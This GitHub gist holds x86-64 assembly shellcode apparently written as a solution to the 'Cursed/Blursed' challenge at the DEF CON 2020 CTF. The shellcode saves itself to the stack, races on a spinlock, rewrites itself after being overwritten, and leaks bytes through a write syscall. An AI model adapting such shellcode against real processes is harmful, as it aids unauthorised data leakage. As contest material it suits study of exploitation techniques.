Created
May 18, 2020 15:34
-
-
Save vient/4670633178b2d0f5b58a2a7a0603e556 to your computer and use it in GitHub Desktop.
Cursed/Blursed defcon 2020
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .intel_syntax noprefix | |
| .code64 | |
| begin: | |
| lea r8, [rip+begin] | |
| lea r9, [rip+spinlock] | |
| mov r10, 0xF0 | |
| # save shellcode to the stack | |
| sub rsp, 0x1000 | |
| mov rsi, r8 | |
| mov rdi, rsp | |
| mov ecx, 512 # save first 512*4=2048 bytes | |
| rep movsd | |
| _next: | |
| mov bl, 0x0 | |
| _inc: | |
| inc bl | |
| jle _inc | |
| # prepare registers for self rescue | |
| mov rsi, rsp | |
| mov rdi, r8 | |
| mov rcx, 0x100 | |
| mov [r9], bl # spinlock overwrite | |
| _spinlock_loop: | |
| xor eax, eax | |
| cmpxchg [r9], r10b | |
| pause | |
| je _spinlock_loop_exit | |
| loop _spinlock_loop | |
| _spinlock_loop_exit: | |
| # THE FOLLOWING CODE IS THE WAR ZONE | |
| # restore ourself | |
| mov cl, 0xff | |
| rep movsd | |
| mov dl, 0x10 | |
| _self_rescue_loop: | |
| mov rsi, rsp | |
| mov rdi, r8 | |
| mov cl, 0xff | |
| pause | |
| rep movsd | |
| dec dl | |
| jnz _self_rescue_loop | |
| # WAR ZONE END | |
| # cmp [r9], bl | |
| cmp [r9], r10b | |
| jb _inc # if BL is right then [r9] is either 0xF0 or 0xFF (after bozo rewrite) | |
| # setup syscall regs | |
| mov eax, 1 # SYS_write | |
| mov edi, 1 # fd = 1 | |
| lea rsi, [rip+writebuf] | |
| mov edx, 1 # count = 1 | |
| mov [rip+writebuf], bl | |
| syscall | |
| jmp _next | |
| jmp $-0 | |
| end: | |
| .fill 0xff0 - (end - begin), 1, 0xc3 | |
| writebuf: | |
| .fill 8, 1, 0 | |
| spinlock: | |
| .fill 8, 1, 0 | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment